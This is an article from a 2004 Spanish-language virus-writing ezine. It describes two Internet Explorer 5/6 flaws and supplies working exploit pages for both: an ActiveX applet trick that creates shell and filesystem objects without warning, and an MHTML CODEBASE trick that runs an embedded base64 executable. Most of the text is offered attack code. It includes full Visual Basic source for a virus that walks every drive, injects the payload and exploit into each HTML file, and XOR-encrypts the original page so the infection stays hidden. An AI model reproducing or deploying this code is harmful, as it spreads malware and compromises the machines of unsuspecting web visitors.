Copy Link
Add to Bookmark
Report
Gedzac Mitosis Ezine Issue 02 006
(C) MITOSIS #2 E-Zine/GEDZAC 2004
Tema : IE 5.X y IE 6.X Bugs
Autor : MachineDramon
Válido para : Microsoft Visual Basic 6.0 y VBScript
En este Articulo se trataran 2 bugs de IE, el primero bastante conocido y solo
funcional en IE 5.X, el segundo algo mas nuevo y funcional en IE 5.X y 6.X
1)Este bug es el usado por los worms VBS/Redlof y VBS/KarmaHotel para poder
ejecutarse, con solo ver una pagina web, y consiste en llamar a los objetos
"WScript.Shell" y "Scripting.FileSystemObject" sin que IE de alertas de
seguridad.
Codigo del bug:
<html>
'Esto es para evitar que el usuario note algo sospechoso en la page y
'para hacer posible el bug llamando al Applet de Java que es vulnerable
<div style='position:absolute; left:0px; top:0px; width:0px; height:0px; z-index:28; visibility: hidden'>
<APPLET NAME=GEDZAC HEIGHT=0 WIDTH=0 code=com.ms.activeX.ActiveXComponent></APPLET></div>
<script language='vbscript'>
'Este es el codigo en VBScript para llamar al Applet que hemos creado
'en este caso llamado GEDZAC
Set AppleObject = document.applets("GEDZAC")
'Con esto creamos el objeto "WScript.Shell"
AppleObject.setCLSID("{F935DC22-1CF0-11D0-ADB9-00C04FD58A0B}")
AppleObject.createInstance()
Set WS = AppleObject.GetObject()
'Con esto creamos el objeto "Scripting.FileSystemObject"
AppleObject.setCLSID("{0D43FE01-F093-11CF-8940-00A0C9054228}")
AppleObject.createInstance()
Set FSO = AppleObject.GetObject()
'Ahora podemos usarlos como si fuera un .vbs por ejemplo aqui mostrara
'un cuadro de mensage con el directorio de windows.
WS.Popup FSO.GetSpecialFolder(0)
</script>
</html>
2)Este bug es más reciente reportado por www.securityfocus.com ,informacion en
español en http://www.vsantivirus.com/vul-mhtml-file.htm
Con el es posible activar archivos ejecutables, incluidos en una pagina web
sin que IE de ninguna advertencia. (me parece que solo en forma local
con el IE 6)
---------------------------------------------------------------------------
A continuacion se coloca el bug original:
MIME-Version: 1.0
Content-Location:file:///malware.exe
Content-Transfer-Encoding: base64
TVpEAQUAAgAgACEA//91AAACAACZAAAAPgAAAAEA+zBqcgAAAAAAAAAAAAAAAAAAAAAAAA
......como 2 hojas de code 64.....
PzU/PzY/Pzc/Pzg/Pzk/Pzo/Pzs/Pzw/Pz0/Pz4/Pz8/Pz8=
<!-- 25.02.03 - http://www.malware.com -->
<title>malware.com</title>
<body bgcolor=black scroll=no>
<SCRIPT>
//25.02.03 - http://www.malware.com
function malware()
{
s=document.URL;path=s.substr(-0,s.lastIndexOf("\\"));
path=unescape(path);
document.write( ' <title>malware.com</title><body scroll=no bgcolor=black><FONT face="Comic Sans MS" color=red style="position:absolute;top:20;left:90;z-index:100; font-size:2cm;">malware.com </center><object style="cursor:cross-hair" alt="moo ha ha" classid="clsid:66666666-6666-6666-6666" CODEBASE="mhtml:'+path+'\\malware.html!file:///malware.exe"></object>')
}
setTimeout("malware()",150)
</script>
-----------------------------------------------------------------------------
Este es un codigo en VB 6.0 para aprovechar este bug en la infeccion de
paginas web.
La idea es que el codigo busque en el disco archivos con extencion htm,
html o plg y verifique la infeccion, si no los infectara.
Si solamente agregamos el codigo en base64 y el bug, el virus funcionara
pero el usuario no podra ver la pagina normalmente.
Para eso el virus debera guardar dentro de la misma pagina el
codigo encriptado, de la misma y codigo en VBScript para desencriptar
el codigo y mostrar la page de forma normal y ejecutar el virus.
'En la Declaraciones generales del Formulario, declaramos variables
Dim Cf, Cw, Cd, CodeCapsideB64, CodeScript1, CodeScript2
Private Sub Form_Load()
'Declaramos Resumidor de Errores y el FSO y WS
On Error Resume Next
Set Cf = CreateObject("Scripting.FileSystemObject")
Set Cw = CreateObject("WScript.Shell")
'Almacenamos en CodeCapsideB64 el codigo en base64 del virus, en este caso
'ubicado el virus en el directorio de windows en un archivo Virus.exe
CodeCapsideB64 = B64(Cf.GetSpecialFolder(0) & "\Virus.exe")
'Almacenamos en CodeScript1 parte del codigo que insertaremos en la pagina
'web infectada, y le agregamos el codigo en base64
CodeScript1 = "MIME-Version: 1.0" & vbCrLf & _
"Content-Location:file:///Capside.exe" & vbCrLf & _
"Content-Transfer-Encoding: base64" & vbCrLf & _
CodeCapsideB64 & vbCrLf & _
"<Script Language = 'VBScript'>" & vbCrLf
'Almacenamos en CodeScript2 la otra parte del codigo que insertaremos
'en la pagina web infectada
CodeScript2 = vbCrLf & "id = setTimeout(" & Chr(34) & "IEB()" & Chr(34) & ", 150)" & vbCrLf & _
"Sub IEB()" & vbCrLf & _
"Vpt = LCase(Document.url)" & vbCrLf & _
"Vtx=" & Chr(34) & "<object style=$cursor:cross-hair$ classid=$clsid:22222222-2222-2222-2222$ CODEBASE=$mhtml:" & Chr(34) & "&Vpt&" & Chr(34) & "!file:///Capside.exe$></object>" & Chr(34) & vbCrLf & _
"Vtx = Replace(Vtx, " & Chr(34) & "$" & Chr(34) & ", Chr(34)): Document.Write (Vtx) & vbCrLf & Capside" & vbCrLf & _
"End Sub" & vbCrLf & _
"Function Ec(code)" & vbCrLf & _
"For i = 1 To Len(code)" & vbCrLf & _
"Ck = Asc(Mid(code, i, 1))" & vbCrLf & _
"If Ck = Asc(" & Chr(34) & "¥" & Chr(34) & ") Then" & vbCrLf & _
"Ec = Ec & " & Chr(34) & "%" & Chr(34) & vbCrLf & _
"ElseIf Ck = 28 Then" & vbCrLf & _
"Ec = Ec & Chr(13)" & vbCrLf & _
"ElseIf Ck = 29 Then" & vbCrLf & _
"Ec = Ec & Chr(10)" & vbCrLf & _
"Else" & vbCrLf & _
"Ec = Ec & Chr(Ck Xor 7)" & vbCrLf & _
"End If" & vbCrLf & _
"Next" & vbCrLf & _
"End Function" & vbCrLf & _
"</Script>"
'Llamamos al procedimiento VDisk
Call VDisck
End Sub
'Este es codigo para listar los discos, subdirectorios y archivos
'y es practicamente igual al metodo usado por VBS/LoveLetter
Sub VDisk()
On Error Resume Next
Set Vd = Cf.Drives
For Each Vdt In Vd
If (Vdt.DriveType = 2) Or (Vdt.DriveType = 3) Then
VFolder Vdt.Path & "\"
End If
Next
End Sub
Sub VFolder(F)
On Error Resume Next
Set Cfl = Cf.GetFolder(F)
Set Cfs = Cfl.Subfolders
For Each Fl In Cfs
VFiles Fl.Path
VFolder Fl.Path
Next
End Sub
Sub VFiles(F)
On Error Resume Next
Set fls = Cf.GetFolder(F)
Set Fs = fls.Files
For Each Fh In Fs
Fx = LCase(Cf.GetExtensionName(Fh.Path))
'Si la extencion del Archivo es htm o html o plg , le pasamos la ruta al
'procedimiento CodeH
If If (Fx = "htm") or (Fx = "html") or (Fx = "plg") Then
CodeH (Fh.Path)
End If
Next
End Sub
'Este es el procedimiento de infeccion
Sub CodeH(rp)
On Error Resume Next
'Abrimos el archivo que le habremos pasado al Sub CodeH
Set H1 = Cf.OpenTextFile(rp)
'Leemos una linea
Hr1 = H1.ReadLine
'Si contiene la palabra "MIME" ya esta infectado y lo cerramos y
'salimos del Sub
If InStr(Hr1, "MIME") <> 0 Then
H1.Close
Exit Sub
'Sino lo leemos totalmente y los cerramos
Else
Hr2 = H1.ReadAll: H1.Close
End If
'Ahora encriptamos todo el contenido de la pagina web
For i = 1 To Len(Hr2)
Ck = Asc(Mid(Hr2, i, 1))
If Ck = Asc("%") Then
Ec = Ec & "¥"
ElseIf Ck = 13 Then
Ec = Ec & Chr(28)
ElseIf Ck = 10 Then
Ec = Ec & Chr(29)
Else
Ec = Ec & Chr(Ck Xor 7)
End If
Next
'Le añadimos al codigo encriptado de la pagina
'parte del codigo en VBSCript
Ec = "Capside = Ec(" & Chr(34) & Ec & Chr(34) & ")"
'Abrimos el archivo colocamos el codigo en VBScript que accionara el virus
'en codeb64 y el contenido de la pagina encriptado.
Set H2 = Cf.OpenTextFile(rp, 2, 1)
H2.Write CodeScript1 & Ec & CodeScript2
H2.Close
End Sub
'Esta es la funcion para obtener el code64
'(funcion sacada de un codigo de Alcopaul)
Public Function B64(ByVal vsFullPathname)
On Error Resume Next
Dim b As Integer: Dim Base64Tab As Variant
Dim bin(3) As Byte: Dim s, sResult As String: Dim l, i, FileIn, n As Long
Base64Tab = Array("A", "B", "C", "D", "E", "F", "G", "H", "I", "J", "K", "L", "M", "N", "O", "P", "Q", "R", "S", "T", "U", "V", "W", "X", "Y", "Z", "a", "b", "c", "d", "e", "f", "g", "h", "i", "j", "k", "l", "m", "n", "o", "p", "q", "r", "s", "t", "u", "v", "w", "x", "y", "z", "0", "1", "2", "3", "4", "5", "6", "7", "8", "9", "+", "/")
Erase bin: l = 0: i = 0: FileIn = 0: b = 0: s = "": FileIn = FreeFile
Open vsFullPathname For Binary As FileIn
sResult = s & vbCrLf: s = "": l = LOF(FileIn) - (LOF(FileIn) Mod 3)
For i = 1 To l Step 3
Get FileIn, , bin(0): Get FileIn, , bin(1): Get FileIn, , bin(2)
If Len(s) > 64 Then
s = s & vbCrLf: sResult = sResult & s: s = ""
End If
b = (bin(n) \ 4) And &H3F: s = s & Base64Tab(b)
b = ((bin(n) And &H3) * 16) Or ((bin(1) \ 16) And &HF)
s = s & Base64Tab(b): b = ((bin(n + 1) And &HF) * 4) Or ((bin(2) \ 64) And &H3)
s = s & Base64Tab(b): b = bin(n + 2) And &H3F: s = s & Base64Tab(b)
Next i
If Not (LOF(FileIn) Mod 3 = 0) Then
For i = 1 To (LOF(FileIn) Mod 3)
Get FileIn, , bin(i - 1)
Next i
If (LOF(FileIn) Mod 3) = 2 Then
b = (bin(0) \ 4) And &H3F: s = s & Base64Tab(b)
b = ((bin(0) And &H3) * 16) Or ((bin(1) \ 16) And &HF)
s = s & Base64Tab(b): b = ((bin(1) And &HF) * 4) Or ((bin(2) \ 64) And &H3)
s = s & Base64Tab(b): s = s & "="
Else
b = (bin(0) \ 4) And &H3F: s = s & Base64Tab(b)
b = ((bin(0) And &H3) * 16) Or ((bin(1) \ 16) And &HF)
s = s & Base64Tab(b): s = s & "=="
End If
End If
If s <> "" Then
s = s & vbCrLf: sResult = sResult & s
End If
s = ""
Close FileIn: B64 = sResult
End Function
-----------------------------------------------------------------------------
El codigo de una pagina infectada sera parecido a:
'Esto indica la version del MIME, el nombre del archivo a ejecutar
'y que esta en base64
MIME-Version: 1.0
Content-Location:file:///Capside.exe
Content-Transfer-Encoding: base64
TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
.....Code64......
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAA==
<Script Language = 'VBScript'>
'Almacenamos en Capside el codigo encriptado de la pagina web y llamamos
'a la funcion Ec para desencriptarlo y mostrar la pagina.
Capside = Ec(";&**'tfqbc'auhj'ruk:/7723.ossw=((ppp)wbut~tsbjt)ibs(thtqnurt(qnurafjh(dhundf)osj'**9;OSJK9;OBFC9;SNSKB9Dhundf;(SNSKB9;JBSF'ossw*bvrnq:Dhisbis*S~wb'dhisbis:%sbs(osjk<'dofutbs:nth*??2>*6%9;JBSF'dhisbis:%JTOSJK'1)77)5177)7%'ifjb:@BIBUFSHU9;JBSF'dhisbis:%qnurt+'jfduhqnurt+'jfduh'qnurt+'`rtfiht+'suh~fi'ohutbt+'fisnqnurt+'wbu't~tsbjt+'wbut~tsbjt+'wbu'fisnqnurt+'wbu'fisnqnurt+'mhu`b'jfdofch%'ifjb:lb~phuct9;TDUNWS's~wb:sbs(mfqftdunws9jbttf`b':'%®'Mhu`b'Jfdofch%<aridsnhi'IhUn`osDkndl/e.'|'''na///ifqn`fshu)fwwIfjb::%Jnduhthas'Nisbuibs'Bwkhubu%.!!/bqbis)ersshi'9'6..'''{{//ifqn`fshu)fwwIfjb::%Ibstdfwb%.!!/e)pondo'9'6...|'''fkbus/jbttf`b.<'''ubsrui'afktb<'''zzchdrjbis)hijhrtbchpi':'IhUn`osDkndl<(('**9;(TDUNWS9;(OBFC9;EHC^'qKnil:$7777aa'knil:$7777aa'kbasJfu`ni:2'shwJfu`ni:79;SFEKB'dbkkTwfdni`:7'dbkkWfccni`:7'pncso:326'ehucbu:79'';SEHC^9'';SU9'''';SC'pncso:010'e`Dhkhu:$7777779'''''';CNQ'fkn`i:dbisbu9'''''';SFEKB'dbkkTwfdni`:6'dbkkWfccni`:3'pncso:010'ehucbu:79'''''''';SEHC^9'''''''';SU'e`Dhkhu:$713f>59'''''''''';SC'qFkn`i:ehsshj'ihPufw'fkn`i:jncckb'pncso:0319'''''''''''';W'fkn`i:kbas9;AHIS'afdb:Qbucfif'dhkhu:$aaaaaa'tn}b:59DHUNDF+'cb'''''''''''''wuhwf`fdnôi'jftnqf'qêf'dhuubh+'dfjenf'dhian`rufdnôi'cb'Nisbuibs'''''''''''''Bwkhubu'~'pfkkwfwbu)'!ietw<;(AHIS9;(W9;(SC9;(SU9'''''''';DBISBU9'''''''';SU'e`Dhkhu:$3>03fc9'''''''''';SC'pncso:0549'''''''''''';W'fkn`i:dbisbu9;AHIS'afdb:Qbucfif'dhkhu:$aaaaaa'tn}b:69/d.'Mhu`b'''''''''''''Jfdofch!ietw<'''''Knjf*Wbuý;(AHIS9;(W9;(SC9;(SU9;(SEHC^9;(SFEKB9;(DBISBU9;(CNQ9;(SC9;(SU9;(SEHC^9;(SFEKB9;W9;AHIS'afdb:Qbucfif'dhkhu:$?77777'tn}b:59;E9QET(DhundfGJJ;(E9;(AHIS9;(W9;W9;AHIS'afdb:Qbucfif'tn}b:59;AHIS'dhkhu:$?777779;E9Dhundf;(E9;(AHIS9'bt'ri'`rtfih'ubwhusfch'bk'53'cb'Tbwsnbjeub'cbk'5775+'vrb'tb'wuhwf`f';F'ouba:%ossw=((ppp)wbut~tsbjt)ibs(thtqnurt(`bibufk(ubjfnkbu)osj%'sfu`bs:Xekfil9jftnqfjbisb;(F9'bi'jbitfmbt'cb'dhuubh+'dhi'ri'fudonqh';F'ouba:%ossw=((ppp)wbut~tsbjt)ibs(thtqnurt(`bibufk(fibfch)osj%'sfu`bs:Xekfil9fibfch;(F9'cb'fwbift'3)5'LE'dhi'bk'ihjeub'cb';E9;AHIS'dhkhu:$?777779Jnduhthas)qet;(AHIS9;(E9+'bi'rih'cb'cht'ahujfsht'tnjnkfubt'dhi'dhisbinch'bi'btwföhk'h'ni`kît);(AHIS9;(W9;W9;AHIS'afdb:Qbucfif'tn}b:59;AHIS'dhkhu:$7777779Btsb';(AHIS9;AHIS'dhkhu:$?777779;E9QET;(E9;(AHIS9;AHIS'dhkhu:$7777779'niabdsf';AHIS'dhkhu:$7777?79;E9Pnichpt'>2(>?(IS(Jb(5777(_W;(E9;(AHIS9+'nidkr~bich'kht'tbuqnchubt';AHIS'dhkhu:$7777?79;E9IS(5777;(E9;(AHIS9);(AHIS9!ietw<;(AHIS9;(W9;W9;NJ@'obn`os:5?5'tud:%DhundfXfudonqht(dhundf6)`na%'pncso:4>7'ehucbu:79;(W9;W9;NJ@'obn`os:5?5'tud:%DhundfXfudonqht(dhundf5)`na%'pncso:4>7'ehucbu:79;AHIS'afdb:Qbucfif'tn}b:59!ietw<';(AHIS9;(W9;W9;AHIS'afdb:Qbucfif'tn}b:59Fk'tbu'bmbdrsfch+'bk'`rtfih'tb'frshdhwnf'f';AHIS'dhkhu:$7777?79;E9D=[¥pnichpt¥[jnduhthas)qet;(E9;(AHIS9'~'wfuf'bmbdrsfutb'kf'wuônjf'qb}'vrb'tb'nindnb'bk'tntsbjf'f`ub`f'bk'tn`rnbisb'qfkhu'fk'ub`ntsuh=;EU9;EU9;E9;AHIS'dhkhu:$7777?79\OLb~XKhdfkXJfdonib[Thaspfub[Jnduhthas[Pnichpt[DruubisQbutnhi[UriZ;(AHIS9;(E9;EU9;AHIS'dhkhu:$7777?79Cbafrks':'%D=[¥pnichpt¥[jnduhthas)qet%;(AHIS9;(AHIS9';(W9;W9;AHIS'afdb:Qbucfif'tn}b:59;AHIS'dhkhu:$?777779;E9¥pnichpt¥;(E9;(AHIS9'bt'rif'qfunfekb'vrb'dhuubtwhicb'f';E9;AHIS'dhkhu:$7777?79D=[Pnichpt;(AHIS9;(E9'bi'Pnichpt'>(JB'~'f';AHIS'dhkhu:$7777?79;E9D=[Pniis;(E9;(AHIS9'bi'Pnichpt'IS[5777[_W)!ietw<;(AHIS9';(W9;W9;AHIS'afdb:Qbucfif'tn}b:59Drfich'btsb'Qntrfk'Eftnd'Tdunws'bt'bmbdrsfch'dubf'ri'fudonqh'cb'ihjeub';AHIS'dhkhu:$?777779;E9JNDUHTHAS)KIL;(E9;(AHIS9'bk'drfk'bt'ri'qêidrkh'cnubdsh'fk';AHIS'dhkhu:$?777779;E9JNDUHTHAS)QET;(E9;(AHIS9+'rendfch'bi'kf'dfuwbsf'cb'Pnichpt+'bk'drfk'dubf'bk'fudonqh';AHIS'dhkhu:$?777779;E9JNDUHTHAS)S_S;(E9;(AHIS9+'dhi'bk'tn`rnbisb'dhisbinch=;EU9;E9)')')')')')'X')')')')')'X')')'X')')')')')')'X')'X')')')'X')')')'X')')')')')')')'X')')')')')'X')')'X')')')')')')'X')'X')')')'X')')')'X')!ietw<;(E9;(AHIS9';(W9;W9;AHIS'afdb:Qbucfif'tn}b:59Sfjenîi'ubfkn}f'kft'tn`rnbisbt'fddnhibt=!ietw<;EU9;EU9Jhcnandfich'kf'tn`rnbisb'kkfqb+'fksbuf'kf'wæ`nif'cb'Nindnh'cbk'Nisbuibs'Bwkhubu'ofdnf'btsb'bikfdb=;(AHIS9';(W9;W9;AHIS'afdb:Qbucfif'tn}b:59;AHIS'dhkhu:$7777?79;E9;F'ouba:%ossw=((ppp)kfsni`rnf)dhj(%9ossw=((ppp)kfsni`rnf)dhj(;(F9!ietw<!ietw<;(E9;(AHIS9;(AHIS9';(W9;W9;AHIS'afdb:Qbucfif'tn}b:59;AHIS'dhkhu:$7777?79;E9\OLB^XDRUUBISXRTBU[Thaspfub[Jnduhthas[Nisbuibs'Bwkhubu[JfniZ;(E9;(AHIS9;EU9;AHIS'dhkhu:$7777?79Tsfus'Wf`b;E9':';(E9%ossw=((ppp)kfsni`rnf)dhj%;(AHIS9!ietw<;(AHIS9';(W9;W9;AHIS'afdb:Qbucfif'tn}b:59Dhi'kh'drfk'wubsbicb'tfsrufu'btb'whusfk)'Ftnjntjh'dubf'kf'kkfqb'cb'ub`ntsuh=!ietw<;(AHIS9';(W9;W9;AHIS'afdb:Qbucfif'tn}b:59;AHIS'dhkhu:$7777?79;E9\OLB^XDKFTTBTXUHHS[QETAnkb[Tobkk[Bcns[DhjjficZ;(E9;(AHIS9;EU9;AHIS'dhkhu:$7777?79Cbafrks':'¥Pnichpt¥[Ihsbwfc)bb'¥%Pnichpt¥%[Jnduhthas)ss!ietw<;(AHIS9;(AHIS9';(W9;W9;AHIS'afdb:Qbucfif'tn}b:59Bk'dhisbinch'cb';E9Jnduhthas)ss;(E9'fisbt'cbsfkkfch+'tb'jhtsufuæ'bi'wfisfkkf'dfcf'qb}'vrb'tb'nisbisb'bcnsfu'ri'fudonqh'dhi'bsbitnôi';E9;AHIS'dhkhu:$?777779)qet;(AHIS9;(E9);(AHIS9';(W9;W9;AHIS'afdb:Qbucfif'tn}b:59Jhcnandf'kf'dhian`rufdnôi'cbk'wfwbk'sfwn}'cbk'btdunshunh'cb'Pnichpt'dhi'kf'tn`rnbisb'kkfqb'cb'ub`ntsuh=;(AHIS9';(W9;W9;AHIS'afdb:Qbucfif'tn}b:59;AHIS'dhkhu:$7777?79;E9\OLB^XDRUUBISXRTBU[Thaspfub[Jnduhthas[Nisbuibs'Bwkhubu[Cbtlshw[@bibufkZ;(E9;(AHIS9;EU9;AHIS'dhkhu:$7777?79Pfkkwfwbu;E9':';(E9¥Pnichpt¥[Fwwkndfsnhi'Cfsf[Jnduhthas[Nisbuibs'Bwkhubu[Pfkkwfwu)oss;(AHIS9;(AHIS9';(W9;W9;AHIS'afdb:Qbucfif'tn}b:59Kf'auftb'%;E9Qnqf'Dhtsf'Undf;(E9%'tb'jhtsufuæ'bi'bk'pfkkwfwbu'/wfwbk'sfwn}.'cbk'btdunshunh'cb'Pnichpt)!ietw<;(AHIS9';(W9;W9;AHIS'afdb:Qbucfif'tn}b:59F'dfrtf'cb'tr'jbitfmb'bi'btwföhk+';AHIS'dhkhu:$?777779;E9Dhundf;(E9;(AHIS9'btsæ'tnbich'ubwhusfch'bi'qfunht'wfntbt'cb'ofekf'ontwfif);EU9;(AHIS9;AHIS'afdb:Qbucfif'tn}b:59;EU9;E9;AHIS'dhkhu:$?777779WBU'FISNQNURT;(AHIS9;(E9;(AHIS9;AHIS'afdb:Qbucfif'dhkhu:$?77777'tn}b:69©;(AHIS9;AHIS'afdb:Qbucfif'tn}b:59;AHIS'dhkhu:$7777?79';(AHIS9qbutnôi'0)1'~'0)0'fdsrfkn}fch'fk'53'cb'Tbwsnbjeub'cbk'5775+'cbsbdsf'~'bknjnif'bandnbisbjbisb'btsb'`rtfih);(AHIS9';(W9;OU'dhkhu:$7777?79;W9;F'ouba:%ossw=((ppp)wbut~tsbjt)ibs(thtqnurt(qnurafjh(nicb)osj%'sfu`bs:Xshw9;AHIS'afdb:Qbucfif'dhkhu:$?77777'tn}b:59;NJ@'obn`os:42'fks:%Nu'fk'jbiý'fisbunhu%'tud:%DhundfXfudonqht(fisbunhu)`na%'pncso:42'ehucbu:79;(AHIS9;(F9;(W9;W9;F'ouba:%ossw=((ppp)wbut~tsbjt)ibs(nicb)osj%'sfu`bs:Xshw9;NJ@'obn`os:2?'fks:%Ub`ubtfu'fk'Whusfk'cb'WBU'T^TSBJT%'tud:%DhundfXfudonqht(ohjb)`na%'pncso:?6'ehucbu:79;(F9;(W9;(EHC^9;(OSJK9")
'Luego de 150 milisegundos(o algo así) es llamado el Sub IEB
id = setTimeout("IEB()", 150)
Sub IEB()
'Obtiene la ruta o url de la pagina web y lo convierte en minusculas
Vpt = LCase(Document.url)
'Este codigo es el que se encarga de hacer posible el bug y se indica el
'nombre de archivo a ejecutar(debe ser el mismo nombre que el colocado
'al empezar la pagina, en la parte del MIME)
Vtx="<object style=$cursor:cross-hair$ classid=$clsid:22222222-2222-2222-2222$ CODEBASE=$mhtml:"&Vpt&"!file:///Capside.exe$></object>"
'Reemplaza en Vtx los $ por comillas (")
Vtx = Replace(Vtx, "$", Chr(34))
'Escribe en el documento a Vtx y al codigo desencriptado de la pagina
'web
Document.Write (Vtx) & vbCrLf & Capside
End Sub
'Esta es la funcion que desencripta el codigo de la pagina
Function Ec(code)
For i = 1 To Len(code)
Ck = Asc(Mid(code, i, 1))
If Ck = Asc("¥") Then
Ec = Ec & "%"
ElseIf Ck = 28 Then
Ec = Ec & Chr(13)
ElseIf Ck = 29 Then
Ec = Ec & Chr(10)
Else
Ec = Ec & Chr(Ck Xor 7)
End If
Next
End Function
</Script>
(C) MITOSIS #2 E-Zine/GEDZAC 2004